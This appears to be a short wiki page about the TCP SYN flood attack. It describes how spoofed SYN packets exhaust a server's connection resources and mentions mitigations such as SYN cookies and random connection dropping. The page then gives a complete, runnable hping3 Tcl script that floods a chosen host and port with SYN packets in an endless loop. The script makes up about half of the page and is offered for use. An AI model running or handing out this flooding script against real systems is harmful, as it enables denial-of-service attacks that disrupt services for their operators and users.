!!The SYN flood is an attack that can nowadays be defined as archaic, although the general idea can still work (in a DDoS, for instance).
The goal of this attack is to send TCP connection requests faster than a machine can process them
in order to saturate the resources and prevent the machine from accepting any more connections.
Actually the attacker does not create a whole TCP connection, but just send a SYN packet
(the first packet required to start a TCP connetion), spoofing at random the source IP address,
so from the attacker point of view the resource to perform the attack is only the bandwidth
because there is no state to take. Modern operating systems are able to handle resources better
than in the past, or to use cryptographic techniques (like Syn cookies or RST cookies) to mitigate
the problem (and allocate memory only after the third packet of a new TCP connection reached the host),
but still the attack can create some problem. A simpler way to face it, that is somewhat effective and
yet very simple, is to drop a connection at random if there are too many open connections.
This wiki is nothing without code, so here we go (as .htcl file).....
# (c) GPL2 fluxist(at)gmail.com
# Usage; hping3 exec ./synflood.htcl <hostname> <dstport>
if {$argc < 2} {
puts "Required arguments: hostname dstport"
exit 1
}
foreach {hostname port} $argv break
set srcport 14000
set target [hping resolve $hostname]
set myaddr [hping outifa $target]
puts "Synflooding $target..."
while {1} {
hping send "ip(saddr=$myaddr,daddr=$target)+tcp(sport=$srcport,dport=$port,flags=s)"
}
|